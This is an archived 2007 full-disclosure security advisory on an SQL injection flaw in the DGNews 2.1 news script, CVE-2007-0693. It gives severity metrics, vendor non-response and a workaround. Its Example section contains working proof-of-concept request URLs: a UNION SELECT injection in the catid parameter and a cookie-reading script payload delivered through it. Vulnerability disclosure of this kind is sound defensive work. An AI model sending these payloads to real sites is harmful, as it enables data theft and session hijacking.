'[Full-disclosure] DGNews version 2.1 SQL Injection Vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] DGNews version 2.1 SQL Injection Vulnerability
From:       "SecurityResearch" <securityresearch () netvigilance ! com>
Date:       2007-05-28 19:51:09
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A574 () beaverton ! portland ! local
[Download RAW message or body]

netVigilance Security Advisory #22

DGNews version 2.1 SQL Injection Vulnerability

Description:
DGNews is small and simple but powered news publishing. Easy installation, no programing \
required. But you can still change whatever you want (for advanced users). Features: add \
unlimited categories, automatic news image thumbnailed, click count, user comment, print view \
and many others. Include full lay out, but sure, you can modify what you need.
This vulnerability can be exploited only when PHP magic_quotes_gpc = Off.

External References: 
Mitre CVE: CVE-2007-0693
NVD NIST: CVE-2007-0693
OSVDB: 34227

Summary: 
DGNews is small and simple but powered news publishing.
Security problems in the product allow attackers commit SQL injections.

Advisory URL: 
http://www.netvigilance.com/advisory0022

Release Date:
05/28/2007

Severity:
Risk: High
 
CVSS Metrics:
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Complete
Integrity Impact: Partial
Availability Impact: Partial 
Impact Bias: Confidentiality
CVSS Base Score: 6.8
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: SQL Injection 

SecureScout Testcase ID:
TC 17952

Vulnerable Systems:
DGNews version 2.1

Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts. This could be exploited \
to obtain sensitive data, modify database contents or acquire administrator's privileges.

Vendor:
Dian Gemilang

Vendor Status: 
The Vendor has been notified several times on many different email addresses last on 14 May \
2007. The Vendor has not responded. There is no official fix at the release of this Security \
Advisory. Workaround:
In the php.ini file set magic_quotes_gpc = On.

Example: 
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/news.php?go=newslist&catid=' UNION SELECT 1,`site_title` \
FROM `news_config` WHERE '1 OR (resultant XSS Attack)
http://[TARGET]/[PRODUCT-DIRECTORY]/ news.php?go=newslist&catid=' UNION SELECT \
1,'<script>alert(document.cookie)</script>' FROM `news_config` WHERE '1 REPLY:
<table width="95%" border="0" cellpadding="2" cellspacing="2" align="center">
<tr> <td class="newscat"><a href=" http://[TARGET]/[PRODUCT-DIRECTORY]" \
class="newscat">Home</a>[SQL INJECTION RESULT]<br />&nbsp;</td></tr></table>

Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic